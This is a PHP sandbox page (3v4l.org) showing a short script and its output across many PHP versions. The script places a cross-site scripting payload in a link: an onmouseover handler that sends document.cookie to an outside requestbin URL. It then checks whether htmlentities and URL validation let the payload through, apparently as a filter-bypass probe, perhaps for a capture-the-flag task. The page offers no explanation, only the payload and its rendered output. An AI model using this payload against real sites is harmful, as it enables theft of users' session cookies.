3v4l.org

run code in 300+ PHP versions simultaneously
<?php function safeHTML($var) { return htmlentities($var); } $link = 'http://moncul.com/toto.jpg\x22onmouseover=javascript:window.location=\x22http://requestb.in/sr3wb0sr?flag=\x22+(document.cookie);'; if (!is_null($link)) { if (!filter_var($link, FILTER_VALIDATE_URL)) printf("ERROR !"); } if (is_null($link)) { $link = 'http://'; printf("NULL !"); } printf('<a href="%s">'."link".'</a>', safeHTML($link)); ?>
Output for 5.4.1 - 5.4.45, 5.5.24 - 5.5.35, 5.6.8 - 5.6.21, 7.0.0 - 7.0.20, 7.1.0 - 7.1.20, 7.2.0 - 7.2.33, 7.3.16 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.27, 8.2.0 - 8.2.18, 8.3.0 - 8.3.4, 8.3.6
<a href="http://moncul.com/toto.jpg\x22onmouseover=javascript:window.location=\x22http://requestb.in/sr3wb0sr?flag=\x22+(document.cookie);">link</a>
Output for 8.3.5
Warning: PHP Startup: Unable to load dynamic library 'sodium.so' (tried: /usr/lib/php/8.3.5/modules/sodium.so (libsodium.so.23: cannot open shared object file: No such file or directory), /usr/lib/php/8.3.5/modules/sodium.so.so (/usr/lib/php/8.3.5/modules/sodium.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 <a href="http://moncul.com/toto.jpg\x22onmouseover=javascript:window.location=\x22http://requestb.in/sr3wb0sr?flag=\x22+(document.cookie);">link</a>
preferences:
170.67 ms | 402 KiB | 224 Q